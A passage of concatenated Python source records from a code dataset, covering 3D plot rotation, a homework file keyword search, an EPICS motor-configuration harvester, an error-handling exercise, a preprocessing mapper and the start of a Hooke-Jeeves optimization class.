hasattr(self.Var.data, attr):\n\t\t\t\t\t\tsetattr(self.Var, attr, getattr(self.Var.data, attr))\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tall_attrs = [i for i in dir(self.Var) if i[:2] != \"__\"]\n\t\t\t\t\tmsg = f\"Can't plot '{self.name}' from the variable '{self.Var.name}'\\n\\n\"\n\t\t\t\t\tmsg += f\"{Variable.name} doesn't have the attribute '{attr}'\" + \"\\n\"\n\t\t\t\t\tmsg += \"\\nAll Attributes\\n\\t* \" + \"\\n\\t* \".join(all_attrs)\n\t\t\t\t\traise SystemError(\"\\n\\n\" + msg)\n\n\t\tself._plot_()\n\n\tdef _plot_(self):\n\t\t\"\"\"A function to be overriden\"\"\"\n\t\tprint(f\"Please override the plot func in {self.name}\")\n\n\tdef _plot_xyz_data(self, ats, a=False, args={'ls': 'None', 'marker': '.'}):\n\t\tif a is False:\n\t\t\tf = plt.figure()\n\t\t\ta = f.add_subplot(111, projection=\"3d\")\n\n\t\t\ta.set_xlabel(\"X\")\n\t\t\ta.set_ylabel(\"Y\")\n\t\t\ta.set_zlabel(\"Z\")\n\n\t\t\ta.view_init(elev=-3, azim=64)\n\n\t\t\ta.set_xticks([])\n\t\t\ta.set_yticks([])\n\t\t\ta.set_zticks([])\n\n\t\ta.plot(ats[:, 0], ats[:, 1], ats[:, 2], **args)\n\n\t\treturn a\n\n\tdef _rotate_plot_(self, ax, elev_increment=False, azim_increment=1, init_elev=30, init_azim=0, step_func=False, args=()):\n\t\t\"\"\"\n\t\tWill rotate a 3D plot.\n\n\t\tInputs:\n\t\t\t* ax => The axis to rotate\n\t\t\t* elev_increment => The value to increment the elevation axis by\n\t\t\t* azim_increment => The value to increment the azimuthal axis by\n\t\t\t* init_elev => The initial elevation of the axis\n\t\t\t* init_azim => The initial azimuth angle of the axis\n\t\t\t* step_func => A function to carry out at each step\n\t\t\"\"\"\n\t\tcount = 0\n\t\tif elev_increment and azim_increment:\n\t\t\tfor elev_ang in np.arange(init_elev, 360 + init_elev, elev_increment):\n\t\t\t\tfor azim_ang in np.arange(init_azim, 360 + init_azim, azim_increment):\n\t\t\t\t\tcount += 1\n\t\t\t\t\tax.view_init(azim=azim_ang, elev=elev_ang)\n\t\t\t\t\tif step_func:\n\t\t\t\t\t\tstep_func(count, *args)\n\n\t\telif elev_increment and not azim_increment:\n\t\t\tfor elev_ang in np.arange(init_elev, 360 + init_elev, elev_increment):\n\t\t\t\tcount += 1\n\t\t\t\tax.view_init(azim=init_azim, elev=elev_ang)\n\t\t\t\tif step_func:\n\t\t\t\t\tstep_func(count, *args)\n\n\t\telif azim_increment and not elev_increment:\n\t\t\tfor azim_ang in np.arange(init_azim, 360 + init_azim, azim_increment):\n\t\t\t\tcount += 1\n\t\t\t\tax.view_init(azim=azim_ang, elev=init_elev)\n\t\t\t\tif step_func:\n\t\t\t\t\tstep_func(count, *args)","sub_path":"src/plot/general_plot.py","file_name":"general_plot.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"506185571","text":"__author__ = 'Nick'\n\n# coding=UTF-8\n\n# Houqi Zuo\n# Homework#04 -- Python\nimport os\nfrom datetime import datetime\n\ndef search( data_list ):\n\t# get input from user\n\tquery= input(\"query:\")\n\t# split the string\n\tquery = query.split()\n\t# delete the duplicated element\n\tsearch=set(query)\n\t# delete \"and\" and \"or\"\n\t# when boolOperator is 1. perform \"and\" operator\n\t# when boolOperator is 0. perform \"or\" operator\n\tboolOperator = 1\n\tif ( \"and\" in search ):\n\t\tsearch.remove(\"and\")\n\tif ( \"or\" in search ):\n\t\tsearch.remove(\"or\")\n\t\tboolOperator = 0\n\t# print\n\tif (boolOperator):\n\t\tprint(\"Performing AND search for:\", search )\n\telse:\n\t\tprint(\"Performing OR search for:\", search )\n\n\tmydict = { word:None for word in search }\n\n\t# get current time\n\tdt1 = datetime.now()\n\tprint( \"The time before search ; \", dt1)\n\t#start_time = time.monotonic()*10000\n\n\t'''\n\t# This codes use pickle technique\n\t# perform search\n\t# AND perform\n\tif (boolOperator):\n\t\t# search\n\t\tfor tuple_in_list in data_list:\n\t\t\t#print(type(tuple_in_list))\n\t\t\tmydict = { x:None for x in mydict.keys() }\n\t\t\tfor key in mydict.keys():\n\t\t\t\tif( key in tuple_in_list[1] ):\n\t\t\t\t\tmydict[key] = 1\n\t\t\t# output\n\t\t\tif ( None not in mydict.values() ):\n\t\t\t\t# get current time\n\t\t\t\tprint(\"Found at:\", tuple_in_list[0] )\n\t\t\t\tprint(\"The last modified time: \", os.path.getmtime( tuple_in_list[0] ) )\n\t\t\t\tprint(\"The size of file is: \", os.path.getsize( tuple_in_list[0] ) )\n\t\t\t\tbreak\n\t# OR perform\n\telse:\n\t\t# search one line by one line\n\t\tfor tuple_in_list in data_list:\n\t\t\t# search\n\t\t\tfor key in mydict.keys():\n\t\t\t\tif ( key in tuple_in_list[1] ):\n\t\t\t\t\t# get current time\n\t\t\t\t\tprint(\"Found at:\" ,tuple_in_list[0])\n\t\t\t\t\tprint(\"The last modified time: \", os.path.getmtime( tuple_in_list[0] ) )\n\t\t\t\t\tprint(\"The size of file is: \", os.path.getsize( tuple_in_list[0] ) )\n\t\t\t\t\tbreak\n\t'''\n\t# This codes use shelve technique\n\t# perform search\n\t# AND perform\n\tif (boolOperator):\n\t\t# search\n\t\tfor i,dict_shelve in data_list.items():\n\t\t\t#print(type(tuple_in_list))\n\t\t\tword = dict_shelve.split()\n\t\t\tmydict = { x:None for x in mydict.keys() }\n\t\t\tfor key in mydict.keys():\n\t\t\t\tif( key in word ):\n\t\t\t\t\tmydict[key] = 1\n\t\t\t# output\n\t\t\tif ( None not in mydict.values() ):\n\t\t\t\t# get current time\n\t\t\t\tprint(\"Found at:\", i )\n\t\t\t\tprint(\"The last modified time: \", os.path.getmtime( i ) )\n\t\t\t\tprint(\"The size of file is: \", os.path.getsize( i ) )\n\t# OR perform\n\telse:\n\t\t# search one line by one line\n\t\tfor i,dict_shelve in data_list.items():\n\t\t\tword = dict_shelve.split()\n\t\t\t# search\n\t\t\tfor key in mydict.keys():\n\t\t\t\tif ( key in word ):\n\t\t\t\t\tprint(\"Found at:\" ,i)\n\t\t\t\t\tprint(\"The last modified time: \", os.path.getmtime( i ) )\n\t\t\t\t\tprint(\"The size of file is: \", os.path.getsize( i ) )\n\t\t\t\t\tbreak\n\t#end_time = time.monotonic() *10000.\n\tdt2 = datetime.now()\n\tprint( \"The time after search : \", dt2)\n\tprint( \"Execution time: %d ms\" % (dt2.microsecond - dt1.microsecond) )","sub_path":"HW#04/FileTraversal/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"318048125","text":"#!/usr/bin/env python\n#\n# A bizarre combination of code from IocManager, the parent/child IOC compilation process, and\n# ParameterManager.\n#\nimport fcntl, re, sys, ast, os, operator\nfrom io import StringIO\n\nfrom psp.options import Options\nfrom psp.Pv import Pv\nimport pyca\n\nfrom .pmgrobj import pmgrobj\n\n\nCONFIG_FILE = \"/reg/g/pcds/pyps/config/%s/iocmanager.cfg\"\nEPICS_TOP = \"/reg/g/pcds/package/epics/\"\nEPICS_SITE_TOP = \"/reg/g/pcds/package/epics/3.14/\"\n\nhutch = None\nfldlist = { 'FLD_HLM',\n 'FLD_HOMD',\n 'FLD_LLM',\n 'FLD_OFF',\n 'FLD_DESC' };\n\ndef caget(pvname,timeout=30.0):\n try:\n pv = Pv(pvname)\n pv.connect(timeout)\n pv.get(ctrl=False, timeout=timeout)\n v = pv.value\n pv.disconnect()\n return v\n except pyca.pyexc as e:\n print('pyca exception: %s' %(e))\n return None\n except pyca.caexc as e:\n print('channel access exception: %s' %(e))\n return None\n\ndef readConfig():\n config = {'procmgr_config': None, 'hosts': None, 'dir':'dir',\n 'id':'id', 'cmd':'cmd', 'flags':'flags', 'port':'port', 'host':'host',\n 'disable':'disable', 'history':'history', 'delay':'delay', 'alias':'alias' }\n vars = set(config.keys())\n cfgfn = CONFIG_FILE % hutch\n f = open(cfgfn, \"r\")\n fcntl.lockf(f, fcntl.LOCK_SH) # Wait for the lock!!!!\n try:\n execfile(cfgfn, {}, config)\n res = config['procmgr_config']\n except:\n res = None\n fcntl.lockf(f, fcntl.LOCK_UN)\n f.close()\n if res == None:\n return None\n d = []\n for l in res:\n if 'disable' in l.keys() and l['disable']:\n continue\n name = l['id']\n dir = l['dir']\n if re.search(\"/ims/\", dir) or re.search(\"/ims$\", dir):\n if dir[0:3] == \"../\":\n dir = EPICS_TOP + dir[3:]\n elif dir[0] != '/':\n dir = EPICS_SITE_TOP + dir\n d.append((name, dir))\n return d\n\nclass config():\n def __init__(self):\n self.path = os.getcwd()\n self.dirname = self.path.split('/')[-1]\n self.ddict = {}\n self.idict = {}\n\n # Pre-define some regular expressions!\n self.doubledollar = re.compile(\"^(.*?)\\$\\$\")\n self.keyword = re.compile(\"^(UP|LOOP|IF|INCLUDE|TRANSLATE|COUNT)\\(|^(CALC)\\{\")\n self.parens = re.compile(\"^\\(([^)]*?)\\)\")\n self.brackets = re.compile(\"^\\{([^}]*?)\\}\")\n self.trargs = re.compile('^\\(([^,]*?),\"([^\"]*?)\",\"([^\"]*?)\"\\)')\n self.ifargs = re.compile('^\\(([^,)]*?),([^,)]*?),([^,)]*?)\\)')\n self.word = re.compile(\"^([A-Za-z0-9_]*)\")\n self.operators = {ast.Add: operator.add,\n ast.Sub: operator.sub,\n ast.Mult: operator.mul,\n ast.Div: operator.truediv,\n ast.Pow: operator.pow,\n ast.LShift : operator.lshift,\n ast.RShift: operator.rshift,\n ast.BitOr: operator.or_,\n ast.BitAnd : operator.and_,\n ast.BitXor: operator.xor}\n\n def create_instance(self, iname, id, idict, ndict):\n try:\n allinst = idict[iname]\n except:\n allinst = []\n idict[iname] = []\n n = str(len(allinst))\n if id != None:\n ndict[id] = (iname, int(n))\n dd = {}\n dd[\"INDEX\"] = n\n return (dd, n)\n\n def finish_instance(self, iname, idict, dd):\n idict[iname].append(dd)\n\n def read_config(self, file, extra):\n w = re.compile(\"^[ \\t]*([^ \\t=]+)\")\n wq = re.compile('^[ \\t]*\"([^\"]*)\"')\n wqq = re.compile(\"^[ \\t]*'([^']*)'\")\n assign = re.compile(\"^[ \\t]*=\")\n sp = re.compile(\"^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]+(.+?)[ \\t]*$\")\n spq = re.compile('^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]+\"([^\"]*)\"[ \\t]*$')\n spqq = re.compile(\"^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]+'([^']*)'[ \\t]*$\")\n eq = re.compile(\"^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]*=[ \\t]*(.*?)[ \\t]*$\")\n eqq = re.compile('^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]*=[ \\t]*\"([^\"]*)\"[ \\t]*$')\n eqqq = re.compile(\"^[ \\t]*([A-Za-z_][A-Za-z0-9_]*)[ \\t]*=[ \\t]*'([^']*)'[ \\t]*$\")\n inst = re.compile(\"^[ \\t]*(([A-Za-z_][A-Za-z0-9_]*):[ \\t]*)?([A-Za-z_][A-Za-z0-9_]*)\\((.*)\\)[ \\t]*$\")\n inst2 = re.compile(\"^[ \\t]*INSTANCE[ \\t]+([A-Za-z_][A-Za-z0-9_]*)[ \\t]*([A-Za-z0-9_]*)[ \\t]*$\")\n\n prminst = re.compile(\"^([A-Za-z_][A-Za-z0-9_]*)(,)\")\n prmidx = re.compile(\"^([A-Za-z_][A-Za-z0-9_]*?)([0-9_]+)(,)\")\n prmeq = re.compile(\"^([A-Za-z_][A-Za-z0-9_]*)=([^,]*)(,)\")\n prmeqq = re.compile('^([A-Za-z_][A-Za-z0-9_]*)=\"([^\"]*)\"(,)')\n prmeqqq = re.compile(\"^([A-Za-z_][A-Za-z0-9_]*)='([^']*)'(,)\")\n\n fp = open(file)\n if not fp:\n raise IOError(\"File %s not found!\" % ( file ))\n lines = [l + \"\\n\" for l in extra] + fp.readlines()\n fp.close()\n origlines = lines\n\n # Do the preliminary config expansion!\n output = StringIO.StringIO()\n expand(self, lines, output)\n value = output.getvalue()\n output.close()\n lines = value.split(\"\\n\")\n\n d = {\"DIRNAME\": self.dirname, \"PATH\" : self.path}\n for l in lines:\n l = l.strip()\n m = inst.search(l)\n if m != None:\n continue # Skip instantiations for now!\n m = inst2.search(l)\n if m != None: # First new-style instantiation --> we're done here!\n break\n # Search for a one-line assignment of some form!\n m = eqqq.search(l)\n if m == None:\n m = eqq.search(l)\n if m == None:\n m = eq.search(l)\n if m == None:\n m = spqq.search(l)\n if m == None:\n m = spq.search(l)\n if m == None:\n m = sp.search(l)\n if m != None:\n var = m.group(1)\n val = m.group(2)\n d[var] = val;\n continue\n if l != \"\" and l[0] != '#':\n print(\"Skipping unknown line: %s\" % l)\n self.ddict = d\n\n # Now that we have the aliases, reprocess the config!\n \n lines = origlines\n output = StringIO.StringIO()\n expand(self, lines, output)\n value = output.getvalue()\n output.close()\n lines = value.split(\"\\n\")\n \n i = {}\n d = {\"DIRNAME\": self.dirname, \"PATH\": self.path}\n nd = {}\n newstyle = False\n ininst = False\n \n for l in lines:\n l = l.strip()\n m = inst2.search(l)\n if m != None:\n newstyle = True\n if newstyle:\n if m != None:\n if ininst:\n self.finish_instance(iname, i, dd)\n ininst = True\n iname = m.group(1)\n id = m.group(2)\n dd, n = self.create_instance(iname, id, i, nd)\n else:\n loc = 0 # Look for parameters!\n first = None\n haveeq = False\n while l[loc:] != '':\n m = assign.search(l[loc:])\n if m != None:\n loc += m.end()\n if haveeq:\n print(\"Double equal sign in |%s|\" % l)\n haveeq = True\n continue # Just ignore it!\n\n m = wqq.search(l[loc:])\n if m != None:\n loc += m.end()\n else:\n m = wq.search(l[loc:])\n if m != None:\n loc += m.end() + 1\n else:\n m = w.search(l[loc:])\n if m != None:\n loc += m.end() + 1\n else:\n break # How does this even happen?!?\n val = m.group(1)\n if first != None:\n dd[first] = val\n d[iname + first + n] = val\n first = None\n else:\n # Could this be an instance parameter?\n useinst = ''\n usenum = 0\n try:\n t = nd[val]\n useinst = t[0]\n usenum = t[1]\n except:\n m = prmidx.search(val+\",\")\n if m != None:\n useinst = m.group(1)\n usenum = int(m.group(2))\n try:\n used = i[useinst][usenum]\n for k in used.keys():\n var = useinst + k\n val = used[k]\n dd[var] = val\n except:\n first = val\n haveeq = False\n continue\n m = inst.search(l)\n if m != None:\n id = m.group(2)\n iname = m.group(3)\n params = m.group(4) + \",\"\n dd, n = self.create_instance(iname, id, i, nd)\n while (params != \"\"):\n m = prmeqqq.search(params)\n if m == None:\n m = prmeqq.search(params)\n if m == None:\n m = prmeq.search(params)\n if m != None:\n # Parameter of the form VAR=VAL. Global dictionary will also\n # get inameVARn=VAL.\n var = m.group(1)\n val = m.group(2)\n dd[var] = val\n d[iname + var + n] = val\n params = params[m.end(3):len(params)]\n else:\n m = prminst.search(params)\n if m != None:\n # This is an instance parameter. It is either old-style,\n # INSTn, or an arbitrary name. Check the name dict first!\n try:\n t = nd[m.group(1)]\n useinst = t[0]\n usenum = t[1]\n params = params[m.end(2):len(params)]\n except:\n m = prmidx.search(params)\n if m == None:\n print(\"Unknown parameter in line %s\" % params)\n params = \"\"\n continue\n useinst = m.group(1)\n usenum = int(m.group(2))\n params = params[m.end(3):len(params)]\n # Find the instance, and add all of its named parameters\n # VAL with the name INSTVAL.\n used = i[useinst][usenum]\n for k in used.keys():\n var = useinst + k\n val = used[k]\n dd[var] = val\n else:\n print(\"Unknown parameter in line %s\" % params)\n params = \"\"\n self.finish_instance(iname, i, dd)\n continue\n # Search for a one-line assignment of some form!\n m = eqqq.search(l)\n if m == None:\n m = eqq.search(l)\n if m == None:\n m = eq.search(l)\n if m == None:\n m = spqq.search(l)\n if m == None:\n m = spq.search(l)\n if m == None:\n m = sp.search(l)\n if m != None:\n var = m.group(1)\n val = m.group(2)\n d[var] = val;\n continue\n if l != \"\" and l[0] != '#':\n print(\"Skipping unknown line: %s\" % l)\n if ininst:\n self.finish_instance(iname, i, dd)\n self.idict = i\n self.ddict = d\n\n def eval_expr(self, expr):\n return self.eval_(ast.parse(expr).body[0].value) # Module(body=[Expr(value=...)])\n\n def eval_(self, node):\n if isinstance(node, ast.Num):\n return node.n\n elif isinstance(node, ast.Name):\n try:\n x = int(self.ddict[node.id])\n except:\n x = 0\n return x\n elif isinstance(node, ast.operator):\n return self.operators[type(node)]\n elif isinstance(node, ast.BinOp):\n return self.eval_(node.op)(self.eval_(node.left), self.eval_(node.right))\n else:\n raise TypeError(node)\n\n\ndef expand(cfg, lines, f):\n i = 0\n loc = 0\n while i < len(lines):\n m = cfg.doubledollar.search(lines[i][loc:])\n if m == None:\n # Line without a $$.\n f.write(\"%s\" % lines[i][loc:])\n i += 1\n loc = 0\n continue\n\n # Write the first part\n f.write(m.group(1))\n pos = loc + m.end(1) # save where we found this!\n loc = pos + 2 # skip the '$$'!\n\n m = cfg.keyword.search(lines[i][loc:])\n if m != None:\n kw = m.group(1)\n if kw == None:\n kw = m.group(2)\n loc += m.end(2) # Leave on the '{'!\n else:\n loc += m.end(1) # Leave on the '('!\n \n if kw == \"TRANSLATE\":\n argm = cfg.trargs.search(lines[i][loc:])\n if argm != None:\n loc += argm.end(3)+2\n elif kw == \"CALC\":\n argm = cfg.brackets.search(lines[i][loc:])\n if argm != None:\n loc += argm.end(1)+1\n elif kw == \"IF\":\n argm = cfg.ifargs.search(lines[i][loc:])\n if argm != None:\n kw = \"TIF\" # Triple IF!\n loc += argm.end(3)+1\n else:\n argm = cfg.parens.search(lines[i][loc:])\n if argm != None:\n loc += argm.end(1)+1\n if pos == 0 and lines[i][loc:].strip() == \"\":\n # If the $$ directive is the entire line, don't add a newline!\n loc = 0;\n i += 1\n else:\n argm = cfg.parens.search(lines[i][loc:])\n if argm != None:\n loc += argm.end(1)+1\n if pos == 0 and lines[i][loc:].strip() == \"\":\n # If the $$ directive is the entire line, don't add a newline!\n loc = 0;\n i += 1\n \n if argm != None:\n if kw == \"LOOP\":\n iname = argm.group(1)\n startloop = re.compile(\"(.*?)\\$\\$LOOP\\(\" + iname + \"(\\))\")\n endloop = re.compile(\"(.*?)\\$\\$ENDLOOP\\(\" + iname + \"(\\))\")\n t = searchforend(lines, endloop, startloop, endloop, i, loc)\n if t == None:\n print(\"Cannot find $$ENDLOOP(%s)?\" % iname)\n sys.exit(1)\n if iname[0] >= \"0\" and iname[0] <= \"9\":\n try:\n cnt = int(iname)\n except:\n cnt = 0\n ilist = [{\"INDEX\": str(n)} for n in range(cnt)]\n elif iname in cfg.idict.keys():\n try:\n ilist = cfg.idict[iname]\n except:\n ilist = []\n else:\n try:\n cnt = int(cfg.ddict[iname])\n except:\n cnt = 0\n ilist = [{\"INDEX\": str(n)} for n in range(cnt)]\n olddict = cfg.ddict\n for inst in ilist:\n cfg.ddict = rename_index(olddict.copy())\n cfg.ddict.update(inst)\n expand(cfg, t[0], f)\n cfg.ddict = olddict\n i = t[1]\n loc = t[2]\n elif kw == \"IF\":\n iname = argm.group(1)\n ifre = re.compile(\"(.*?)\\$\\$IF\\(\" + iname + \"(\\))\")\n endre = re.compile(\"(.*?)\\$\\$ENDIF\\(\" + iname + \"(\\))\")\n elsere = re.compile(\"(.*?)\\$\\$ELSE\\(\" + iname + \"(\\))\")\n t = searchforend(lines, endre, ifre, endre, i, loc)\n if t == None:\n print(\"Cannot find $$ENDIF(%s)?\" % iname)\n sys.exit(1)\n elset = searchforend(t[0], elsere, ifre, endre, 0, 0)\n try:\n v = cfg.ddict[iname]\n except:\n v = \"\"\n if v != \"\":\n # True, do the if!\n if elset != None:\n newlines = elset[0]\n else:\n newlines = t[0]\n expand(cfg, newlines, f)\n else:\n # False, do the else!\n if elset != None:\n newlines = t[0][elset[1]:]\n newlines[0] = newlines[0][elset[2]:]\n expand(cfg, newlines, f)\n i = t[1]\n loc = t[2]\n elif kw == \"TIF\":\n iname = argm.group(1)\n newlines = []\n try:\n v = cfg.ddict[iname]\n except:\n v = \"\"\n if v != \"\":\n # True, do the if!\n newlines.append(argm.group(2))\n else:\n # False, do the else!\n newlines.append(argm.group(3))\n expand(cfg, newlines, f)\n elif kw == \"INCLUDE\":\n try:\n fn = cfg.ddict[argm.group(1)]\n except:\n fn = argm.group(1)\n try:\n newlines=open(fn).readlines()\n expand(cfg, newlines, f)\n except:\n print(\"Cannot open file %s!\" % fn)\n elif kw == \"COUNT\":\n try:\n cnt = str(len(cfg.idict[argm.group(1)]))\n except:\n cnt = \"0\"\n f.write(cnt)\n elif kw == \"CALC\":\n # Either $$CALC{expr} or $$CALC{expr,format}.\n args = argm.group(1).split(\",\")\n output = StringIO.StringIO()\n expand(cfg, [args[0]], output)\n value = output.getvalue()\n output.close()\n if len(args) > 1:\n fmt = args[1]\n else:\n fmt = \"%d\"\n try:\n v = cfg.eval_expr(value)\n except:\n v = 0\n f.write(fmt % (v))\n elif kw == \"UP\":\n try:\n fn = cfg.ddict[argm.group(1)]\n except:\n fn = argm.group(1)\n try:\n f.write(fn[:fn.rindex('/')])\n except:\n pass\n else: # Must be \"TRANSLATE\"\n try:\n val = cfg.ddict[argm.group(1)].translate(string.maketrans(enumstring(argm.group(2)),\n enumstring(argm.group(3))))\n f.write(val)\n except:\n pass\n else:\n print(\"Malformed $$%s statement?\" % kw)\n sys.exit(1)\n continue\n \n # Just a variable reference!\n if lines[i][loc] == \"(\":\n m = cfg.parens.search(lines[i][loc:])\n else:\n m = cfg.word.search(lines[i][loc:])\n if m != None:\n try:\n val = cfg.ddict[m.group(1)]\n f.write(val)\n except:\n pass\n if lines[i][loc] == '(':\n loc += m.end(1) + 1\n else:\n loc += m.end(1)\n else:\n print(\"Can't find variable name?!?\")\n\ndef getMotorVals(pvbase):\n d = {}\n for f in fldlist:\n try:\n d[f] = caget(pvbase + \".\" + f[4:])\n except:\n d[f] = None\n return d\n\ndef makeMotor(ioc, pvbase, port, extra=\"\"):\n d = getMotorVals(pvbase)\n cat = \"Manual\"\n if extra != \"\":\n extra = \" \" + extra\n d.update({'name': pvbase,\n 'config' : 0,\n 'owner' : hutch,\n 'rec_base': pvbase,\n 'category': cat,\n 'mutex': ' ab',\n 'comment': ioc + extra,\n 'FLD_PORT': port,\n 'FLD_DHLM': None,\n 'FLD_DLLM': None })\n return d\n\ndef findMotors(cfglist, ioc):\n motors = []\n for (name, dir) in cfglist:\n if ioc != None and ioc != name:\n continue\n cfg = config()\n try:\n cfg.read_config(dir + \"/\" + name + \".cfg\", {})\n except:\n print(\"WARNING: %s has no configuration file!\" % name)\n continue # Wow, XCS has one *really* old controller!!\n for k in cfg.idict.keys():\n if k == 'MOTOR':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['NAME'], i['PORT'], \"\"))\n elif k == 'IPM':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['DIODE_X'], i['DDX_PORT'],\n i['NAME'] + \" IPM DIODE_X\"))\n motors.append(makeMotor(name, i['DIODE_Y'], i['DDY_PORT'],\n i['NAME'] + \" IPM DIODE_Y\"))\n motors.append(makeMotor(name, i['TARGET_Y'], i['TTY_PORT'],\n i['NAME'] + \" IPM TARGET_Y\"))\n elif k == 'PIM':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['YAG'], i['PORT'],\n i['NAME'] + \" PIM\"))\n elif k == 'SLIT':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['LEFT'], i['LEFT_PORT'],\n i['NAME'] + \" SLIT LEFT\"))\n motors.append(makeMotor(name, i['RIGHT'], i['RIGHT_PORT'],\n i['NAME'] + \" SLIT RIGHT\"))\n motors.append(makeMotor(name, i['TOP'], i['TOP_PORT'],\n i['NAME'] + \" SLIT TOP\"))\n motors.append(makeMotor(name, i['BOTTOM'], i['BOTTOM_PORT'],\n i['NAME'] + \" SLIT BOTTOM\"))\n elif k == 'NAVITAR':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['ZOOM'], i['ZOOM_PORT'],\n i['NAME'] + \" ZOOM\"))\n try:\n motors.append(makeMotor(name, i['FOCUS'], i['FOCUS_PORT'],\n i['NAME'] + \" FOCUS\"))\n except:\n pass\n elif k == 'XFLS':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['X'], i['X_PORT'],\n i['NAME'] + \" XFLS X\"))\n motors.append(makeMotor(name, i['Y'], i['Y_PORT'],\n i['NAME'] + \" XFLS Y\"))\n try:\n motors.append(makeMotor(name, i['Z'], i['Z_PORT'],\n i['NAME'] + \" XFLS Z\"))\n except:\n pass\n elif k == 'INOUT':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['MOTOR'], i['PORT'],\n i['NAME'] + \" INOUT\"))\n elif k == 'REFL':\n for i in cfg.idict[k]:\n motors.append(makeMotor(name, i['MIRROR'], i['PORT'],\n i['NAME'] + \" REFL\"))\n return motors\n\nif __name__ == '__main__':\n # Options( [mandatory list, optional list, switches list] )\n options = Options(['hutch'], ['ioc'], ['debug'])\n try:\n options.parse()\n except Exception as msg:\n options.usage(str(msg))\n sys.exit()\n hutch = options.hutch\n cfglist = readConfig()\n motors = findMotors(cfglist, options.ioc)\n pmgr = pmgrobj(\"ims_motor\", hutch)\n if options.debug != None:\n for m in motors:\n print(m['name'], m['FLD_PORT'], caget(m['rec_base']+\".PN\"))\n else:\n pmgr.start_transaction()\n for m in motors:\n pmgr.objectInsert(m)\n errlist = pmgr.end_transaction()\n for e in errlist:\n print(e)\n","sub_path":"pmgr/harvester.py","file_name":"harvester.py","file_ext":"py","file_size_in_byte":26657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"226797541","text":"# Error test\ndef add(a, b):\n return a+b\n\n\n# add(1)\n\ndef divide(num1, num2):\n try:\n return num1 / num2\n except ZeroDivisionError:\n return \"Please do not divide by zero\"\n except TypeError:\n return \"Please provide two integers or floats\"\n\n\nprint(divide(4, 2))\nprint(divide([], \"1\"))\nprint(divide(1, 0))\nprint()","sub_path":"ud/colt_steele/python_bootcamp/debugging_error_handling.py","file_name":"debugging_error_handling.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"597943481","text":"\nimport sys\n\ndef map_lines(lines):\n current_cid = None\n for line in lines:\n line = line.strip()\n type,val1,val2 = line.split(\",\", 2)\n # handle lines like: C,\"10001\",10001\n if type == 'C':\n current_cid = val2\n # handle lines like V,1001,1\n elif current_cid is not None and type == 'V':\n yield line + \",C,{}\".format(current_cid)\n\nif __name__ == '__main__':\n for line in map_lines(sys.stdin):\n print(line)","sub_path":"week4-hw/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266562414","text":"import math\nimport matrix\nimport excel_transfer\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import mlab\n\nfrom resource import expression\n\n\nclass HJPS:\n def __init__(self):\n self.commands = {\n \"commands\": {\n \"none\": 0,\n \"exit\": 1,\n \"test\": 2,\n \"clear\": 3,\n \"help\": 4,\n \"new\": 5,\n \"show slist\": 6,\n \"show scount\": 7,\n \"acc\": 8,\n \"mk\": 9,\n \"start\": 10,\n \"show result\": 11,\n \"image 1\": 12\n },\n \"description\": {\n \"none\": \"do nothing\",\n \"exit\": \"exit from module\",\n \"test\": \"do test stuff\",\n \"clear\": \"clear something\",\n \"help\": \"display helpfull information\",\n \"new\": \"enter new raw data\",\n \"show slist\": \"show raw data\",\n \"show scount\": \"show something\",\n \"acc\": \"set accuracy\",\n \"mk\": \"set default raw data\",\n \"start\": \"start calculation process\",\n \"show result\": \"show result\",\n \"image 1\": \"show visualization\"\n }\n }\n self.expression = expression.Expression(\"No name\", \"x**2\")\n self.accuracy = 3\n self.x_start = {\"x1\": 0, \"x2\": 0}\n self.x_delta = {\"x1\": 0, \"x2\": 0}\n self.result = {\"i\": [], \"xk\": [], \"x_delta\": [], \"fx\": []}\n self.epsilon = [1, 1]\n self.makedefault()\n\n\n\n def showCommands(self):\n print('')\n print(\"Commands...\")\n print(\"---\")\n for item in self.commands[\"commands\"]:\n print(str(item) + \":\")\n print(\"Number: \" + str(self.commands[\"commands\"][item]))\n print(\"Description: \" + str(self.commands[\"description\"][item]))\n print(\"---\")\n\n def enterCommand(self):\n command = \"0\"\n print('')\n print(\"Enter command (help for Q&A)\")\n while (command not in self.commands):\n command = input(\"->\")\n if (command not in self.commands[\"commands\"]):\n print(\"There is no such command\")\n else:\n return self.commands[\"commands\"][command]\n\n def showHelp(self):\n print('')\n print(\"Help v0.002\")\n self.showCommands()\n\n def makedefault(self):\n self.epsilon[0] = 10 ** (-self.accuracy)\n self.epsilon[1] = self.epsilon[0]\n self.expression = expression.Expression(\"Function\", \"(x1-2)**2+x2**2\")\n self.expression.parameters[\"unimodal\"] = True\n self.x_start = {\"x1\": 4.0, \"x2\": 6.0}\n self.x_delta = {\"x1\": 0.6, \"x2\": 0.8}\n self.result = {\"i\": [], \"xk\": [], \"x_delta\": [], \"fx\": []}\n self.h = self.epsilon\n\n def importparam(self, accuracy):\n self.accuracy = accuracy\n\n def setaccuracy(self):\n task = 0\n print('')\n print(\"Enter accuracy:\")\n while (task != 1):\n self.accuracy = int(input(\"-> \"))\n print(\"Input is correct? (enter - yes/n - no)\")\n command = input(\"-> 